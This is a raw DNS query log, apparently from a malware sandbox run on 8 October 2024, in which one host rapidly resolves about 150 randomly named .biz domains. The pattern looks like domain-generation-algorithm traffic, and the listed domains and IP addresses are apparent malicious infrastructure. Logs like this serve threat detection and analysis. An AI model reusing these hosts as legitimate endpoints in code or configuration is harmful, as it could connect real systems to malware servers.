                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.414376974 CEST1.1.1.1192.168.2.40x1fd8No error (0)pwlqfu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:41.742618084 CEST1.1.1.1192.168.2.40xdac8No error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.282615900 CEST1.1.1.1192.168.2.40x2a98No error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:42.458024979 CEST1.1.1.1192.168.2.40xacf6No error (0)rrqafepng.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:43.884025097 CEST1.1.1.1192.168.2.40x323No error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.261286020 CEST1.1.1.1192.168.2.40x267fNo error (0)ctdtgwag.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.374773979 CEST1.1.1.1192.168.2.40x2bafNo error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:44.374773979 CEST1.1.1.1192.168.2.40x2bafNo error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.402045965 CEST1.1.1.1192.168.2.40x84c1No error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:45.907013893 CEST1.1.1.1192.168.2.40xd989No error (0)tnevuluw.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:46.422475100 CEST1.1.1.1192.168.2.40x682No error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.072500944 CEST1.1.1.1192.168.2.40x1fc6No error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:47.313606024 CEST1.1.1.1192.168.2.40xe89bNo error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:48.014929056 CEST1.1.1.1192.168.2.40xefffNo error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642077923 CEST1.1.1.1192.168.2.40xabadNo error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:49.642086983 CEST1.1.1.1192.168.2.40x699cNo error (0)gjogvvpsf.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.477194071 CEST1.1.1.1192.168.2.40x51cNo error (0)cikivjto.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:50.685930967 CEST1.1.1.1192.168.2.40x3112No error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.487108946 CEST1.1.1.1192.168.2.40x34a1No error (0)qncdaagct.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.279155970 CEST1.1.1.1192.168.2.40xa3acNo error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.279191017 CEST1.1.1.1192.168.2.40xa3acNo error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.017364025 CEST1.1.1.1192.168.2.40xb89No error (0)shpwbsrw.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.429665089 CEST1.1.1.1192.168.2.40x314dNo error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.429682016 CEST1.1.1.1192.168.2.40x314dNo error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.267066956 CEST1.1.1.1192.168.2.40xdbb3No error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.267091036 CEST1.1.1.1192.168.2.40xdbb3No error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.396401882 CEST1.1.1.1192.168.2.40xf138No error (0)cjvgcl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.902245045 CEST1.1.1.1192.168.2.40x8b9fNo error (0)neazudmrq.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.488837957 CEST1.1.1.1192.168.2.40xfae6No error (0)pgfsvwx.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.211448908 CEST1.1.1.1192.168.2.40xaa7dNo error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.294387102 CEST1.1.1.1192.168.2.40xfa6eNo error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.294405937 CEST1.1.1.1192.168.2.40xfa6eNo error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.170397043 CEST1.1.1.1192.168.2.40x77c9No error (0)pectx.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.157155037 CEST1.1.1.1192.168.2.40x1d49No error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.698559999 CEST1.1.1.1192.168.2.40x3baaNo error (0)aatcwo.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.754949093 CEST1.1.1.1192.168.2.40x2185No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.340930939 CEST1.1.1.1192.168.2.40xe756No error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.449840069 CEST1.1.1.1192.168.2.40x2a95No error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.451421976 CEST1.1.1.1192.168.2.40x2a95No error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.582195044 CEST1.1.1.1192.168.2.40x6ebcNo error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.582214117 CEST1.1.1.1192.168.2.40x6ebcNo error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.958690882 CEST1.1.1.1192.168.2.40x70abNo error (0)nwdnxrd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.189076900 CEST1.1.1.1192.168.2.40xd355No error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.710712910 CEST1.1.1.1192.168.2.40x29bdNo error (0)ereplfx.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.404294968 CEST1.1.1.1192.168.2.40x5bf8No error (0)ptrim.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.404335976 CEST1.1.1.1192.168.2.40x5bf8No error (0)ptrim.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.679826975 CEST1.1.1.1192.168.2.40x8c21No error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.423347950 CEST1.1.1.1192.168.2.40xb75aNo error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.423347950 CEST1.1.1.1192.168.2.40xb75aNo error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.756195068 CEST1.1.1.1192.168.2.40xe4e8No error (0)znwbniskf.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.459042072 CEST1.1.1.1192.168.2.40x68f8No error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.365204096 CEST1.1.1.1192.168.2.40x479bNo error (0)cpclnad.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.380871058 CEST1.1.1.1192.168.2.40x8459No error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.844377995 CEST1.1.1.1192.168.2.40xe6d0No error (0)mjheo.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:08.023073912 CEST1.1.1.1192.168.2.40xbe6aNo error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:08.324904919 CEST1.1.1.1192.168.2.40x775dNo error (0)wluwplyh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.300026894 CEST1.1.1.1192.168.2.40x3213No error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.300050974 CEST1.1.1.1192.168.2.40x3213No error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.851672888 CEST1.1.1.1192.168.2.40xd597No error (0)zgapiej.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.851721048 CEST1.1.1.1192.168.2.40xd597No error (0)zgapiej.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.209791899 CEST1.1.1.1192.168.2.40x854fNo error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.419677973 CEST1.1.1.1192.168.2.40x35aNo error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.419797897 CEST1.1.1.1192.168.2.40x35aNo error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.919450998 CEST1.1.1.1192.168.2.40xb5feNo error (0)xnxvnn.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.191695929 CEST1.1.1.1192.168.2.40x2d22No error (0)cikivjto.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.883533955 CEST1.1.1.1192.168.2.40xadeNo error (0)qncdaagct.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:11.883570910 CEST1.1.1.1192.168.2.40xadeNo error (0)qncdaagct.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.078691006 CEST1.1.1.1192.168.2.40x51d9No error (0)ihcnogskt.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.511759996 CEST1.1.1.1192.168.2.40x6832No error (0)shpwbsrw.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:13.876818895 CEST1.1.1.1192.168.2.40x435aNo error (0)kkqypycm.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.337467909 CEST1.1.1.1192.168.2.40xfdbbNo error (0)uevrpr.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:15.888361931 CEST1.1.1.1192.168.2.40xa7ecNo error (0)fgajqjyhr.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.666527033 CEST1.1.1.1192.168.2.40xb5b3No error (0)hagujcj.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:16.682542086 CEST1.1.1.1192.168.2.40x2fabNo error (0)cjvgcl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.187130928 CEST1.1.1.1192.168.2.40x379dNo error (0)neazudmrq.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.189021111 CEST1.1.1.1192.168.2.40xed19No error (0)sctmku.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.846589088 CEST1.1.1.1192.168.2.40x33d6No error (0)pgfsvwx.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.846605062 CEST1.1.1.1192.168.2.40x33d6No error (0)pgfsvwx.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:17.943367958 CEST1.1.1.1192.168.2.40x1203No error (0)qcrsp.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:18.334948063 CEST1.1.1.1192.168.2.40x1342No error (0)aatcwo.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:18.696737051 CEST1.1.1.1192.168.2.40x4276No error (0)sewlqwcd.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.198524952 CEST1.1.1.1192.168.2.40xe83fNo error (0)dyjdrp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.808171034 CEST1.1.1.1192.168.2.40x50a2No error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:19.808439016 CEST1.1.1.1192.168.2.40x50a2No error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.078119040 CEST1.1.1.1192.168.2.40x5927No error (0)napws.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.078172922 CEST1.1.1.1192.168.2.40x5927No error (0)napws.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.083045959 CEST1.1.1.1192.168.2.40x5927No error (0)napws.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.091000080 CEST1.1.1.1192.168.2.40xf373No error (0)nwdnxrd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.997060061 CEST1.1.1.1192.168.2.40x8c5cNo error (0)qvuhsaqa.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.690917015 CEST1.1.1.1192.168.2.40xfda0No error (0)ereplfx.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.776432037 CEST1.1.1.1192.168.2.40x62edNo error (0)apzzls.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.780838013 CEST1.1.1.1192.168.2.40x8d58No error (0)ptrim.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.780855894 CEST1.1.1.1192.168.2.40x8d58No error (0)ptrim.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.789833069 CEST1.1.1.1192.168.2.40xb02aNo error (0)krnsmlmvd.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.789846897 CEST1.1.1.1192.168.2.40xb02aNo error (0)krnsmlmvd.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.909574986 CEST1.1.1.1192.168.2.40x8dc1No error (0)nlscndwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.969969034 CEST1.1.1.1192.168.2.40x9237No error (0)znwbniskf.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.970031977 CEST1.1.1.1192.168.2.40x9237No error (0)znwbniskf.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.970918894 CEST1.1.1.1192.168.2.40x641bNo error (0)bzkysubds.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.971287012 CEST1.1.1.1192.168.2.40x641bNo error (0)bzkysubds.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.477132082 CEST1.1.1.1192.168.2.40x180No error (0)ltpqsnu.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.986869097 CEST1.1.1.1192.168.2.40xec9cNo error (0)vnvbt.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.321964979 CEST1.1.1.1192.168.2.40x2937No error (0)cpclnad.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.477036953 CEST1.1.1.1192.168.2.40xe229No error (0)ypituyqsq.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.806025982 CEST1.1.1.1192.168.2.40xa087No error (0)mjheo.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.167625904 CEST1.1.1.1192.168.2.40x8759No error (0)ijnmvqa.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.167643070 CEST1.1.1.1192.168.2.40x8759No error (0)ijnmvqa.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.282222033 CEST1.1.1.1192.168.2.40x44f0No error (0)wluwplyh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.050183058 CEST1.1.1.1192.168.2.40xa430No error (0)tltxn.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.530766010 CEST1.1.1.1192.168.2.40xfbb0No error (0)vgypotwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.716885090 CEST1.1.1.1192.168.2.40xdc62No error (0)zgapiej.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.203341007 CEST1.1.1.1192.168.2.40xe864No error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.284136057 CEST1.1.1.1192.168.2.40xa713No error (0)giliplg.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.701740026 CEST1.1.1.1192.168.2.40xcbd4No error (0)xnxvnn.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.771761894 CEST1.1.1.1192.168.2.40xb5b2No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.900620937 CEST1.1.1.1192.168.2.40x3720No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:36.594144106 CEST1.1.1.1192.168.2.40xc865No error (0)ihcnogskt.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:36.594661951 CEST1.1.1.1192.168.2.40x667dNo error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.361228943 CEST1.1.1.1192.168.2.40x84c9No error (0)kkqypycm.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.367343903 CEST1.1.1.1192.168.2.40xb7c2No error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.897706985 CEST1.1.1.1192.168.2.40xd914No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.897706985 CEST1.1.1.1192.168.2.40xd914No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:38.934562922 CEST1.1.1.1192.168.2.40x18c5Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:38.947499990 CEST1.1.1.1192.168.2.40xf643No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:39.786298990 CEST1.1.1.1192.168.2.40x5294No error (0)uevrpr.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.284915924 CEST1.1.1.1192.168.2.40x82d0No error (0)fgajqjyhr.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.311197042 CEST1.1.1.1192.168.2.40xbc0bName error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.319757938 CEST1.1.1.1192.168.2.40xf3bdName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.331504107 CEST1.1.1.1192.168.2.40x8539No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:41.030932903 CEST1.1.1.1192.168.2.40x6c4No error (0)hagujcj.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:41.572021008 CEST1.1.1.1192.168.2.40xb557No error (0)sctmku.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:42.360300064 CEST1.1.1.1192.168.2.40xc18No error (0)qcrsp.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.106113911 CEST1.1.1.1192.168.2.40x131eNo error (0)sewlqwcd.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.617567062 CEST1.1.1.1192.168.2.40x8796No error (0)dyjdrp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.537683010 CEST1.1.1.1192.168.2.40x511No error (0)napws.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.752326965 CEST1.1.1.1192.168.2.40xe72dNo error (0)qvuhsaqa.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.193948984 CEST1.1.1.1192.168.2.40xb77bNo error (0)apzzls.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.966646910 CEST1.1.1.1192.168.2.40x3156No error (0)krnsmlmvd.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.328537941 CEST1.1.1.1192.168.2.40x905cNo error (0)nlscndwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.100379944 CEST1.1.1.1192.168.2.40x132No error (0)bzkysubds.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.021342993 CEST1.1.1.1192.168.2.40xe61eNo error (0)ltpqsnu.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.601727009 CEST1.1.1.1192.168.2.40x2bf2No error (0)vnvbt.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.512458086 CEST1.1.1.1192.168.2.40xed25No error (0)ypituyqsq.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.032753944 CEST1.1.1.1192.168.2.40xc7d0No error (0)ijnmvqa.biz35.164.78.200A (IP address)IN (0x0001)false
